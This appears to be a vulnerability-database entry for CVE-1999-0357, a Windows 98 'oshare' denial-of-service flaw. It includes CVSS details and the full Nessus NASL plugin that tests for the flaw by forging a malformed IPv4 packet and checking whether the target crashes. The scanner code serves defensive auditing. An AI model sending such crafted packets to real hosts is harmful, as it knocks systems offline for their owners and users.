Vulnerabilities > CVE-1999-0357 - Unspecified vulnerability in Microsoft Windows 98

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
microsoft
nessus

Summary

Windows 98 and other operating systems allows remote attackers to cause a denial of service via crafted "oshare" packets, possibly involving invalid fragmentation offsets.

Vulnerable Configurations

Part Description Count
OS
Microsoft
1

Nessus

NASL familyWindows
NASL idOSHARE.NASL
descriptionIt was possible to crash the remote system using the
last seen2020-06-01
modified2020-06-02
plugin id10170
published1999-07-29
reporterThis script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10170
titleMicrosoft Windows 98 Malformed oshare Packet DoS
code
#
# (C) Tenable Network Security, Inc.
#

# This attack is very unlikely to work from a large number
# of systems which check ip->ip_len before sending the packets.
#

include("compat.inc");

if (description)
{
 script_id(10170);
 script_version("1.26");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0357");

 script_name(english:"Microsoft Windows 98 Malformed oshare Packet DoS");
 script_summary(english:"Crashes the remote host using the 'oshare' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote system using the 'oshare' attack.

An attacker may use this problem to prevent your site from working
properly.");
 script_set_attribute(attribute:"solution", value:"Contact your vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/01/25");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/07/29");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
ip = forge_ip_packet(ip_v : 4, ip_len : 44, ip_hl : 11,
		     ip_tos : 0, ip_id : rand(), ip_off : 16383,
		     ip_ttl : 0xFF, ip_p : IPPROTO_UDP,
		     ip_src : compat::this_host());

start_denial();
send_packet(ip, pcap_active:FALSE);

alive = end_denial();
if(!alive){
		security_hole(0);
		set_kb_item(name:"Host/dead", value:TRUE);
	  }